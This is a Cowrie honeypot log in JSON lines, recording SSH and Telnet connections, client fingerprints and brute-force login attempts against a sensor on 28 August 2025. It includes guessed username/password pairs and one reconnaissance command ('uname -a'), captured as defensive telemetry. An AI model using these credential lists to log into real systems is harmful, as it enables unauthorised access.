{"eventid":"cowrie.session.closed","duration":12.80818796157837,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:49:29.757748Z","src_ip":"212.227.125.160","session":"4f19587dbb23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60821,"dst_ip":"1.2.3.4","dst_port":23,"session":"731e61879018","protocol":"telnet","message":"New connection: 212.227.125.160:60821 (1.2.3.4:23) [session: 731e61879018]","sensor":"my-vps","timestamp":"2025-08-28T04:49:29.998930Z"}
{"eventid":"cowrie.session.closed","duration":12.745449542999268,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:49:42.744302Z","src_ip":"212.227.125.160","session":"731e61879018"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32904,"dst_ip":"1.2.3.4","dst_port":23,"session":"8405eaf05762","protocol":"telnet","message":"New connection: 212.227.125.160:32904 (1.2.3.4:23) [session: 8405eaf05762]","sensor":"my-vps","timestamp":"2025-08-28T04:49:42.919371Z"}
{"eventid":"cowrie.session.closed","duration":12.796795129776001,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:49:55.716098Z","src_ip":"212.227.125.160","session":"8405eaf05762"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33233,"dst_ip":"1.2.3.4","dst_port":23,"session":"45f1499928ac","protocol":"telnet","message":"New connection: 212.227.125.160:33233 (1.2.3.4:23) [session: 45f1499928ac]","sensor":"my-vps","timestamp":"2025-08-28T04:49:55.932127Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:50:01.795897Z","src_ip":"212.227.125.160","session":"0871ef06d54e"}
{"eventid":"cowrie.session.closed","duration":180.1747443675995,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:50:01.802141Z","src_ip":"212.227.125.160","session":"0871ef06d54e"}
{"eventid":"cowrie.session.closed","duration":12.797695636749268,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:50:08.729750Z","src_ip":"212.227.125.160","session":"45f1499928ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33564,"dst_ip":"1.2.3.4","dst_port":23,"session":"71389d62dd1d","protocol":"telnet","message":"New connection: 212.227.125.160:33564 (1.2.3.4:23) [session: 71389d62dd1d]","sensor":"my-vps","timestamp":"2025-08-28T04:50:08.898370Z"}
{"eventid":"cowrie.session.closed","duration":12.800504446029663,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:50:21.698807Z","src_ip":"212.227.125.160","session":"71389d62dd1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33896,"dst_ip":"1.2.3.4","dst_port":23,"session":"3820667e211a","protocol":"telnet","message":"New connection: 212.227.125.160:33896 (1.2.3.4:23) [session: 3820667e211a]","sensor":"my-vps","timestamp":"2025-08-28T04:50:21.905732Z"}
{"eventid":"cowrie.session.closed","duration":12.748637199401855,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:50:34.654294Z","src_ip":"212.227.125.160","session":"3820667e211a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60938,"dst_ip":"1.2.3.4","dst_port":22,"session":"736740541212","protocol":"ssh","message":"New connection: 212.227.235.229:60938 (1.2.3.4:22) [session: 736740541212]","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.123070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.123983Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.212528Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.392004Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.392888Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.482605Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"fb:45:99:e0:62:c5:fd:de:22:62:0f:57:3d:b6:71:55","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T04:53:36.483233Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:53:46.123110Z","src_ip":"212.227.235.229","session":"736740541212"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39786,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcbbd57b5079","protocol":"telnet","message":"New connection: 212.227.235.229:39786 (1.2.3.4:23) [session: dcbbd57b5079]","sensor":"my-vps","timestamp":"2025-08-28T04:54:36.440376Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:54:36.648157Z","src_ip":"212.227.235.229","session":"dcbbd57b5079"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:54:36.705400Z","src_ip":"212.227.235.229","session":"dcbbd57b5079"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53936,"dst_ip":"1.2.3.4","dst_port":22,"session":"31403e159f00","protocol":"ssh","message":"New connection: 217.72.205.35:53936 (1.2.3.4:22) [session: 31403e159f00]","sensor":"my-vps","timestamp":"2025-08-28T04:55:00.119142Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:55:00.120279Z","src_ip":"217.72.205.35","session":"31403e159f00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2856ad53a00","protocol":"ssh","message":"New connection: 212.227.235.229:6100 (1.2.3.4:22) [session: a2856ad53a00]","sensor":"my-vps","timestamp":"2025-08-28T04:55:46.307456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T04:55:46.465621Z","src_ip":"212.227.235.229","session":"a2856ad53a00"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T04:55:46.625685Z","src_ip":"212.227.235.229","session":"a2856ad53a00"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":14336,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f08bdd2e8cb","protocol":"ssh","message":"New connection: 80.94.95.112:14336 (1.2.3.4:22) [session: 7f08bdd2e8cb]","sensor":"my-vps","timestamp":"2025-08-28T04:55:58.686443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:55:58.687267Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:55:58.717962Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bravehea","message":"login attempt [admin/bravehea] failed","sensor":"my-vps","timestamp":"2025-08-28T04:55:58.923251Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bookcase","message":"login attempt [admin/bookcase] failed","sensor":"my-vps","timestamp":"2025-08-28T04:55:59.955745Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"blunted","message":"login attempt [admin/blunted] failed","sensor":"my-vps","timestamp":"2025-08-28T04:56:00.988890Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"blackcock","message":"login attempt [admin/blackcock] failed","sensor":"my-vps","timestamp":"2025-08-28T04:56:02.021916Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"biker1","message":"login attempt [admin/biker1] failed","sensor":"my-vps","timestamp":"2025-08-28T04:56:03.055139Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:56:04.088453Z","src_ip":"80.94.95.112","session":"7f08bdd2e8cb"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":12103,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb4709006e1e","protocol":"ssh","message":"New connection: 186.225.142.90:12103 (1.2.3.4:22) [session: cb4709006e1e]","sensor":"my-vps","timestamp":"2025-08-28T04:56:07.294434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:56:07.775937Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T04:56:07.776793Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.login.success","username":"root","password":"0890105521","message":"login attempt [root/0890105521] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:56:10.829980Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:56:12.251178Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T04:56:12.253072Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:56:13.028178Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:56:13.504431Z","src_ip":"186.225.142.90","session":"cb4709006e1e"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T04:56:18.269177Z","src_ip":"212.227.235.229","session":"a2856ad53a00"}
{"eventid":"cowrie.session.closed","duration":"32.0","message":"Connection lost after 32.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:56:18.270642Z","src_ip":"212.227.235.229","session":"a2856ad53a00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"9312d0c06d81","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: 9312d0c06d81]","sensor":"my-vps","timestamp":"2025-08-28T04:56:47.400935Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:56:47.445388Z","src_ip":"212.227.125.160","session":"9312d0c06d81"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":30418,"dst_ip":"1.2.3.4","dst_port":22,"session":"3374951cf41f","protocol":"ssh","message":"New connection: 80.94.95.15:30418 (1.2.3.4:22) [session: 3374951cf41f]","sensor":"my-vps","timestamp":"2025-08-28T04:56:50.396383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:56:50.397277Z","src_ip":"80.94.95.15","session":"3374951cf41f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:56:50.448400Z","src_ip":"80.94.95.15","session":"3374951cf41f"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T04:56:50.746473Z","src_ip":"80.94.95.15","session":"3374951cf41f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:56:51.802825Z","src_ip":"80.94.95.15","session":"3374951cf41f"}
